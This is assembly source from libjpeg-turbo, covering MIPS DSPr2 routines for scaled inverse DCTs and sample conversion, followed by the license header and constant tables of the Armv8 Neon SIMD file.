addu t8, t5, t2
subu t5, t5, t2
shll_s.w t6, t6, 6 /* saturating shift: clamps descaled value */
shll_s.w t3, t3, 6
shll_s.w t7, t7, 6
shll_s.w t4, t4, 6
shll_s.w t8, t8, 6
shll_s.w t5, t5, 6
sra t6, t6, 24
addiu t6, t6, 128 /* level shift to unsigned sample range */
sra t3, t3, 24
addiu t3, t3, 128
sb t6, 0(s5)
sra t7, t7, 24
addiu t7, t7, 128
sb t3, 5(s5)
sra t4, t4, 24
addiu t4, t4, 128
sb t7, 1(s5)
sra t8, t8, 24
addiu t8, t8, 128
sb t4, 4(s5)
addiu v0, v0, 24 /* next workspace row */
sra t5, t5, 24
addiu t5, t5, 128
sb t8, 2(s5)
addiu a2, a2, 4
bne v0, v1, 2b
sb t5, 3(s5) /* branch delay slot: last pixel of the row */
addiu sp, sp, 144 /* release workspace */
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_idct_6x6_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_12x12_pass1_dspr2)
/*
 * First pass of the 12x12 scaled inverse DCT: process the 8 columns of
 * coefficients and write 12 rows of 32-bit intermediates into workspace.
 *
 * a0 = compptr->dct_table  (16-bit quantization multipliers)
 * a1 = coef_block          (16-bit DCT coefficients)
 * a2 = workspace           (output: 12 rows x 8 columns of int32,
 *                           row stride 32 bytes)
 */
SAVE_REGS_ON_STACK 16, s0, s1, s2, s3
li a3, 8 /* column counter */
1:
/* odd part */
lh t0, 48(a1)
lh t1, 48(a0)
lh t2, 16(a1)
lh t3, 16(a0)
lh t4, 80(a1)
lh t5, 80(a0)
lh t6, 112(a1)
lh t7, 112(a0)
mul t0, t0, t1 /* z2 */
mul t1, t2, t3 /* z1 */
mul t2, t4, t5 /* z3 */
mul t3, t6, t7 /* z4 */
li t4, 10703 /* FIX(1.306562965) */
li t5, 4433 /* FIX_0_541196100 */
li t6, 7053 /* FIX(0.860918669) */
mul t4, t0, t4 /* tmp11 */
mul t5, t0, t5 /* -tmp14 */
addu t7, t1, t2 /* tmp10 */
addu t8, t7, t3 /* tmp10 + z4 */
mul t6, t6, t8 /* tmp15 */
li t8, 2139 /* FIX(0.261052384) */
mul t8, t7, t8 /* MULTIPLY(tmp10, FIX(0.261052384)) */
li t7, 2295 /* FIX(0.280143716) */
mul t7, t1, t7 /* MULTIPLY(z1, FIX(0.280143716)) */
addu t9, t2, t3 /* z3 + z4 */
li s0, 8565 /* FIX(1.045510580) */
mul t9, t9, s0 /* -tmp13 */
li s0, 12112 /* FIX(1.478575242) */
mul s0, t2, s0 /* MULTIPLY(z3, FIX(1.478575242)) */
li s1, 12998 /* FIX(1.586706681) */
mul s1, t3, s1 /* MULTIPLY(z4, FIX(1.586706681)) */
li s2, 5540 /* FIX(0.676326758) */
mul s2, t1, s2 /* MULTIPLY(z1, FIX(0.676326758)) */
li s3, 16244 /* FIX(1.982889723) */
mul s3, t3, s3 /* MULTIPLY(z4, FIX(1.982889723)) */
subu t1, t1, t3 /* z1-=z4 */
subu t0, t0, t2 /* z2-=z3 */
addu t2, t0, t1 /* z1+z2 */
li t3, 4433 /* FIX_0_541196100 */
mul t2, t2, t3 /* z3 */
li t3, 6270 /* FIX_0_765366865 */
mul t1, t1, t3 /* MULTIPLY(z1, FIX_0_765366865) */
li t3, 15137 /* FIX_1_847759065 */
mul t0, t0, t3 /* MULTIPLY(z2, FIX_1_847759065) */
addu t8, t6, t8 /* tmp12 */
addu t3, t8, t4 /* tmp12 + tmp11 */
addu t3, t3, t7 /* tmp10 */
subu t8, t8, t9 /* tmp12 + tmp13 */
addu s0, t5, s0
subu t8, t8, s0 /* tmp12 */
subu t9, t6, t9
subu s1, s1, t4
addu t9, t9, s1 /* tmp13 */
subu t6, t6, t5
subu t6, t6, s2
subu t6, t6, s3 /* tmp15 */
/* even part start */
lh t4, 64(a1)
lh t5, 64(a0)
lh t7, 32(a1)
lh s0, 32(a0)
lh s1, 0(a1)
lh s2, 0(a0)
lh s3, 96(a1)
lh v0, 96(a0)
mul t4, t4, t5 /* DEQUANTIZE(inptr[DCTSIZE*4],
quantptr[DCTSIZE*4]) */
mul t5, t7, s0 /* DEQUANTIZE(inptr[DCTSIZE*2],
quantptr[DCTSIZE*2]) */
mul t7, s1, s2 /* DEQUANTIZE(inptr[DCTSIZE*0],
quantptr[DCTSIZE*0]) */
mul s0, s3, v0 /* DEQUANTIZE(inptr[DCTSIZE*6],
quantptr[DCTSIZE*6]) */
/* odd part end */
addu t1, t2, t1 /* tmp11 */
subu t0, t2, t0 /* tmp14 */
/* update counter and pointers */
addiu a3, a3, -1
addiu a0, a0, 2
addiu a1, a1, 2
/* even part rest */
li s1, 10033 /* FIX(1.224744871) */
li s2, 11190 /* FIX(1.366025404) */
mul t4, t4, s1 /* z4 */
mul s1, t5, s2 /* z4 */
sll t5, t5, 13 /* z1 */
sll t7, t7, 13
addiu t7, t7, 1024 /* z3 (rounding bias folded into DC) */
sll s0, s0, 13 /* z2 */
addu s2, t7, t4 /* tmp10 */
subu t4, t7, t4 /* tmp11 */
subu s3, t5, s0 /* tmp12 */
addu t2, t7, s3 /* tmp21 */
subu s3, t7, s3 /* tmp24 */
addu t7, s1, s0 /* tmp12 */
addu v0, s2, t7 /* tmp20 */
subu s2, s2, t7 /* tmp25 */
subu s1, s1, t5 /* z4 - z1 */
subu s1, s1, s0 /* tmp12 */
addu s0, t4, s1 /* tmp22 */
subu t4, t4, s1 /* tmp23 */
/* final output stage */
addu t5, v0, t3
subu v0, v0, t3
addu t3, t2, t1
subu t2, t2, t1
addu t1, s0, t8
subu s0, s0, t8
addu t8, t4, t9
subu t4, t4, t9
addu t9, s3, t0
subu s3, s3, t0
addu t0, s2, t6
subu s2, s2, t6
sra t5, t5, 11 /* descale pass-1 results by 2^11 */
sra t3, t3, 11
sra t1, t1, 11
sra t8, t8, 11
sra t9, t9, 11
sra t0, t0, 11
sra s2, s2, 11
sra s3, s3, 11
sra t4, t4, 11
sra s0, s0, 11
sra t2, t2, 11
sra v0, v0, 11
sw t5, 0(a2) /* workspace rows 0..11, stride 32 bytes */
sw t3, 32(a2)
sw t1, 64(a2)
sw t8, 96(a2)
sw t9, 128(a2)
sw t0, 160(a2)
sw s2, 192(a2)
sw s3, 224(a2)
sw t4, 256(a2)
sw s0, 288(a2)
sw t2, 320(a2)
sw v0, 352(a2)
bgtz a3, 1b
addiu a2, a2, 4 /* branch delay slot: next column */
RESTORE_REGS_FROM_STACK 16, s0, s1, s2, s3
j ra
nop
END(jsimd_idct_12x12_pass1_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_12x12_pass2_dspr2)
/*
 * Second pass of the 12x12 scaled inverse DCT: process the 12 rows of
 * 32-bit intermediates produced by pass 1 and emit 12 bytes per row.
 *
 * a0 = workspace  (input: 12 rows x 8 columns of int32, row stride 32)
 * a1 = output     (array of 12 row pointers; each row gets 12 samples)
 */
SAVE_REGS_ON_STACK 16, s0, s1, s2, s3
li a3, 12 /* row counter */
1:
/* Odd part */
lw t0, 12(a0)
lw t1, 4(a0)
lw t2, 20(a0)
lw t3, 28(a0)
li t4, 10703 /* FIX(1.306562965) */
li t5, 4433 /* FIX_0_541196100 */
mul t4, t0, t4 /* tmp11 */
mul t5, t0, t5 /* -tmp14 */
addu t6, t1, t2 /* tmp10 */
li t7, 2139 /* FIX(0.261052384) */
mul t7, t6, t7 /* MULTIPLY(tmp10, FIX(0.261052384)) */
addu t6, t6, t3 /* tmp10 + z4 */
li t8, 7053 /* FIX(0.860918669) */
mul t6, t6, t8 /* tmp15 */
li t8, 2295 /* FIX(0.280143716) */
mul t8, t1, t8 /* MULTIPLY(z1, FIX(0.280143716)) */
addu t9, t2, t3 /* z3 + z4 */
li s0, 8565 /* FIX(1.045510580) */
mul t9, t9, s0 /* -tmp13 */
li s0, 12112 /* FIX(1.478575242) */
mul s0, t2, s0 /* MULTIPLY(z3, FIX(1.478575242)) */
li s1, 12998 /* FIX(1.586706681) */
mul s1, t3, s1 /* MULTIPLY(z4, FIX(1.586706681)) */
li s2, 5540 /* FIX(0.676326758) */
mul s2, t1, s2 /* MULTIPLY(z1, FIX(0.676326758)) */
li s3, 16244 /* FIX(1.982889723) */
mul s3, t3, s3 /* MULTIPLY(z4, FIX(1.982889723)) */
subu t1, t1, t3 /* z1 -= z4 */
subu t0, t0, t2 /* z2 -= z3 */
addu t2, t1, t0 /* z1 + z2 */
li t3, 4433 /* FIX_0_541196100 */
mul t2, t2, t3 /* z3 */
li t3, 6270 /* FIX_0_765366865 */
mul t1, t1, t3 /* MULTIPLY(z1, FIX_0_765366865) */
li t3, 15137 /* FIX_1_847759065 */
mul t0, t0, t3 /* MULTIPLY(z2, FIX_1_847759065) */
addu t3, t6, t7 /* tmp12 */
addu t7, t3, t4
addu t7, t7, t8 /* tmp10 */
subu t3, t3, t9
subu t3, t3, t5
subu t3, t3, s0 /* tmp12 */
subu t9, t6, t9
subu t9, t9, t4
addu t9, t9, s1 /* tmp13 */
subu t6, t6, t5
subu t6, t6, s2
subu t6, t6, s3 /* tmp15 */
addu t1, t2, t1 /* tmp11 */
subu t0, t2, t0 /* tmp14 */
/* even part */
lw t2, 16(a0) /* z4 */
lw t4, 8(a0) /* z1 */
lw t5, 0(a0) /* z3 */
lw t8, 24(a0) /* z2 */
li s0, 10033 /* FIX(1.224744871) */
li s1, 11190 /* FIX(1.366025404) */
mul t2, t2, s0 /* z4 */
mul s0, t4, s1 /* z4 */
addiu t5, t5, 0x10 /* fold pass-2 rounding bias into z3 */
sll t5, t5, 13 /* z3 */
sll t4, t4, 13 /* z1 */
sll t8, t8, 13 /* z2 */
subu s1, t4, t8 /* tmp12 */
addu s2, t5, t2 /* tmp10 */
subu t2, t5, t2 /* tmp11 */
addu s3, t5, s1 /* tmp21 */
subu s1, t5, s1 /* tmp24 */
addu t5, s0, t8 /* tmp12 */
addu v0, s2, t5 /* tmp20 */
subu t5, s2, t5 /* tmp25 */
subu t4, s0, t4
subu t4, t4, t8 /* tmp12 */
addu t8, t2, t4 /* tmp22 */
subu t2, t2, t4 /* tmp23 */
/* increment counter and pointers */
addiu a3, a3, -1
addiu a0, a0, 32 /* next workspace row */
/* Final stage */
addu t4, v0, t7
subu v0, v0, t7
addu t7, s3, t1
subu s3, s3, t1
addu t1, t8, t3
subu t8, t8, t3
addu t3, t2, t9
subu t2, t2, t9
addu t9, s1, t0
subu s1, s1, t0
addu t0, t5, t6
subu t5, t5, t6
sll t4, t4, 4 /* position value for the saturating shift below */
sll t7, t7, 4
sll t1, t1, 4
sll t3, t3, 4
sll t9, t9, 4
sll t0, t0, 4
sll t5, t5, 4
sll s1, s1, 4
sll t2, t2, 4
sll t8, t8, 4
sll s3, s3, 4
sll v0, v0, 4
shll_s.w t4, t4, 2 /* saturating shift left: clamps the range */
shll_s.w t7, t7, 2
shll_s.w t1, t1, 2
shll_s.w t3, t3, 2
shll_s.w t9, t9, 2
shll_s.w t0, t0, 2
shll_s.w t5, t5, 2
shll_s.w s1, s1, 2
shll_s.w t2, t2, 2
shll_s.w t8, t8, 2
shll_s.w s3, s3, 2
shll_s.w v0, v0, 2
srl t4, t4, 24 /* descale to 8-bit sample magnitude */
srl t7, t7, 24
srl t1, t1, 24
srl t3, t3, 24
srl t9, t9, 24
srl t0, t0, 24
srl t5, t5, 24
srl s1, s1, 24
srl t2, t2, 24
srl t8, t8, 24
srl s3, s3, 24
srl v0, v0, 24
lw t6, 0(a1) /* outptr = output[row] */
addiu t4, t4, 0x80 /* level shift to unsigned samples */
addiu t7, t7, 0x80
addiu t1, t1, 0x80
addiu t3, t3, 0x80
addiu t9, t9, 0x80
addiu t0, t0, 0x80
addiu t5, t5, 0x80
addiu s1, s1, 0x80
addiu t2, t2, 0x80
addiu t8, t8, 0x80
addiu s3, s3, 0x80
addiu v0, v0, 0x80
sb t4, 0(t6)
sb t7, 1(t6)
sb t1, 2(t6)
sb t3, 3(t6)
sb t9, 4(t6)
sb t0, 5(t6)
sb t5, 6(t6)
sb s1, 7(t6)
sb t2, 8(t6)
sb t8, 9(t6)
sb s3, 10(t6)
sb v0, 11(t6)
bgtz a3, 1b
addiu a1, a1, 4 /* branch delay slot: next row pointer */
RESTORE_REGS_FROM_STACK 16, s0, s1, s2, s3
jr ra
nop
END(jsimd_idct_12x12_pass2_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_convsamp_dspr2)
/*
 * Convert one 8x8 block of unsigned 8-bit samples to centered 16-bit
 * DCT workspace values (sample - 128), fully unrolled over the 8 rows.
 *
 * a0 = sample_data  (array of 8 row pointers)
 * a1 = start_col    (byte offset added to each row pointer)
 * a2 = workspace    (output: 64 x 16-bit values)
 *
 * t7 = 0xff80ff80 packs two -128 halfwords, so one addu.ph applies the
 * -128 level shift to two samples at once.  preceu.ph.qbr/qbl zero-extend
 * the right/left byte pairs of a word into halfwords; ulw/usw handle the
 * potentially unaligned row reads and workspace writes.
 */
lw t0, 0(a0) /* row 0 pointer */
li t7, 0xff80ff80 /* two packed -128 halfwords */
addu t0, t0, a1
ulw t1, 0(t0) /* samples 0..3 (unaligned) */
ulw t2, 4(t0) /* samples 4..7 */
preceu.ph.qbr t3, t1 /* zero-extend bytes 0,1 to halfwords */
preceu.ph.qbl t4, t1 /* zero-extend bytes 2,3 */
lw t0, 4(a0) /* row 1 pointer (preloaded) */
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7 /* subtract 128 from each halfword */
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 0(a2)
usw t4, 4(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 8(a2)
usw t6, 12(a2)
lw t0, 8(a0) /* row 2 */
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 16(a2)
usw t4, 20(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 24(a2)
usw t6, 28(a2)
lw t0, 12(a0) /* row 3 */
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 32(a2)
usw t4, 36(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 40(a2)
usw t6, 44(a2)
lw t0, 16(a0) /* row 4 */
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 48(a2)
usw t4, 52(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 56(a2)
usw t6, 60(a2)
lw t0, 20(a0) /* row 5 */
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 64(a2)
usw t4, 68(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 72(a2)
usw t6, 76(a2)
lw t0, 24(a0) /* row 6 */
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 80(a2)
usw t4, 84(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 88(a2)
usw t6, 92(a2)
lw t0, 28(a0) /* row 7 */
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 96(a2)
usw t4, 100(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 104(a2)
usw t6, 108(a2)
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu.ph t3, t3, t7
addu.ph t4, t4, t7
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 112(a2)
usw t4, 116(a2)
usw t5, 120(a2)
usw t6, 124(a2)
j ra
nop
END(jsimd_convsamp_dspr2)
#ifndef __mips_soft_float
/*****************************************************************************/
LEAF_DSPR2(jsimd_convsamp_float_dspr2)
/*
 * Convert one 8x8 block of unsigned sample bytes into a float workspace:
 * each byte is level-shifted by -128 (centering) and converted to single
 * precision.  The loop is fully unrolled, one instruction group per image
 * row; the pointer for the NEXT row (lw t0, ...) is issued early, between
 * the stores, to hide the load latency.
 *
 * a0 = sample_data (array of 8 row pointers)
 * a1 = start_col   (byte offset added to each row pointer)
 * a2 = workspace   (64 floats, written sequentially, 32 bytes per row)
 *
 * Clobbers: t0-t8, f2-f16 (even-numbered single-precision registers).
 */
.set at /* let the assembler use $at when expanding macro instructions */
/* elemr 0 */
lw t0, 0(a0) /* t0 = sample_data[0] */
addu t0, t0, a1 /* t0 += start_col */
lbu t1, 0(t0) /* load 8 unsigned sample bytes of this row */
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128 /* level shift: sample - 128 */
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2 /* move the shifted integers into the FPU... */
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2 /* ...and convert int32 -> float32 */
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 4(a0) /* early load of the next row pointer */
swc1 f2, 0(a2) /* store 8 floats to workspace[0..7] */
swc1 f4, 4(a2)
swc1 f6, 8(a2)
addu t0, t0, a1 /* next row: t0 += start_col */
swc1 f8, 12(a2)
swc1 f10, 16(a2)
swc1 f12, 20(a2)
swc1 f14, 24(a2)
swc1 f16, 28(a2)
/* elemr 1 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 8(a0)
swc1 f2, 32(a2)
swc1 f4, 36(a2)
swc1 f6, 40(a2)
addu t0, t0, a1
swc1 f8, 44(a2)
swc1 f10, 48(a2)
swc1 f12, 52(a2)
swc1 f14, 56(a2)
swc1 f16, 60(a2)
/* elemr 2 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 12(a0)
swc1 f2, 64(a2)
swc1 f4, 68(a2)
swc1 f6, 72(a2)
addu t0, t0, a1
swc1 f8, 76(a2)
swc1 f10, 80(a2)
swc1 f12, 84(a2)
swc1 f14, 88(a2)
swc1 f16, 92(a2)
/* elemr 3 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 16(a0)
swc1 f2, 96(a2)
swc1 f4, 100(a2)
swc1 f6, 104(a2)
addu t0, t0, a1
swc1 f8, 108(a2)
swc1 f10, 112(a2)
swc1 f12, 116(a2)
swc1 f14, 120(a2)
swc1 f16, 124(a2)
/* elemr 4 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 20(a0)
swc1 f2, 128(a2)
swc1 f4, 132(a2)
swc1 f6, 136(a2)
addu t0, t0, a1
swc1 f8, 140(a2)
swc1 f10, 144(a2)
swc1 f12, 148(a2)
swc1 f14, 152(a2)
swc1 f16, 156(a2)
/* elemr 5 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 24(a0)
swc1 f2, 160(a2)
swc1 f4, 164(a2)
swc1 f6, 168(a2)
addu t0, t0, a1
swc1 f8, 172(a2)
swc1 f10, 176(a2)
swc1 f12, 180(a2)
swc1 f14, 184(a2)
swc1 f16, 188(a2)
/* elemr 6 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 28(a0)
swc1 f2, 192(a2)
swc1 f4, 196(a2)
swc1 f6, 200(a2)
addu t0, t0, a1
swc1 f8, 204(a2)
swc1 f10, 208(a2)
swc1 f12, 212(a2)
swc1 f14, 216(a2)
swc1 f16, 220(a2)
/* elemr 7 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
swc1 f2, 224(a2) /* last row: no further row pointer to prefetch */
swc1 f4, 228(a2)
swc1 f6, 232(a2)
swc1 f8, 236(a2)
swc1 f10, 240(a2)
swc1 f12, 244(a2)
swc1 f14, 248(a2)
swc1 f16, 252(a2)
j ra
nop /* branch delay slot */
END(jsimd_convsamp_float_dspr2)
#endif
/*****************************************************************************/
/*
* Armv8 Neon optimizations for libjpeg-turbo
*
* Copyright (C) 2009-2011, Nokia Corporation and/or its subsidiary(-ies).
* All Rights Reserved.
* Author: Siarhei Siamashka <siarhei.siamashka@nokia.com>
* Copyright (C) 2013-2014, Linaro Limited. All Rights Reserved.
* Author: Ragesh Radhakrishnan <ragesh.r@linaro.org>
* Copyright (C) 2014-2016, 2020, D. R. Commander. All Rights Reserved.
* Copyright (C) 2015-2016, 2018, Matthieu Darbois. All Rights Reserved.
* Copyright (C) 2016, Siarhei Siamashka. All Rights Reserved.
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
#if defined(__linux__) && defined(__ELF__)
.section .note.GNU-stack, "", %progbits /* mark stack as non-executable */
#endif
#if defined(__APPLE__)
.section __DATA, __const
#elif defined(_WIN32)
.section .rdata
#else
.section .rodata, "a", %progbits
#endif
/* Constants for jsimd_idct_islow_neon() */
#define F_0_298 2446 /* FIX(0.298631336) */
#define F_0_390 3196 /* FIX(0.390180644) */
#define F_0_541 4433 /* FIX(0.541196100) */
#define F_0_765 6270 /* FIX(0.765366865) */
#define F_0_899 7373 /* FIX(0.899976223) */
#define F_1_175 9633 /* FIX(1.175875602) */
#define F_1_501 12299 /* FIX(1.501321110) */
#define F_1_847 15137 /* FIX(1.847759065) */
#define F_1_961 16069 /* FIX(1.961570560) */
#define F_2_053 16819 /* FIX(2.053119869) */
#define F_2_562 20995 /* FIX(2.562915447) */
#define F_3_072 25172 /* FIX(3.072711026) */
/*
 * 16-bit fixed-point multipliers for the slow-but-accurate IDCT;
 * FIX(x) = x * 2^13 (CONST_BITS = 13).  The table is loaded as v0/v1 by
 * jsimd_idct_islow_neon, so the lane ORDER here must stay in sync with
 * the XFIX_* lane macros defined before that function.  Entries that are
 * subtracted in the scalar algorithm are stored negated, letting the code
 * use plain smull/smlal throughout.  Padded to 32 bytes (two q-registers).
 */
.balign 16
Ljsimd_idct_islow_neon_consts:
.short F_0_298
.short -F_0_390
.short F_0_541
.short F_0_765
.short - F_0_899
.short F_1_175
.short F_1_501
.short - F_1_847
.short - F_1_961
.short F_2_053
.short - F_2_562
.short F_3_072
.short 0 /* padding */
.short 0
.short 0
.short 0
#undef F_0_298
#undef F_0_390
#undef F_0_541
#undef F_0_765
#undef F_0_899
#undef F_1_175
#undef F_1_501
#undef F_1_847
#undef F_1_961
#undef F_2_053
#undef F_2_562
#undef F_3_072
/* Constants for jsimd_ycc_*_neon() */
.balign 16
Ljsimd_ycc_rgb_neon_consts:
.short 0, 0, 0, 0 /* padding / unused lanes */
.short 22971, -11277, -23401, 29033 /* fixed-point YCbCr->RGB factors; values match 1.40200*2^14, -0.34414*2^15, -0.71414*2^15, 1.77200*2^14 — NOTE(review): confirm scale against the ycc_rgb converter (not in this view) */
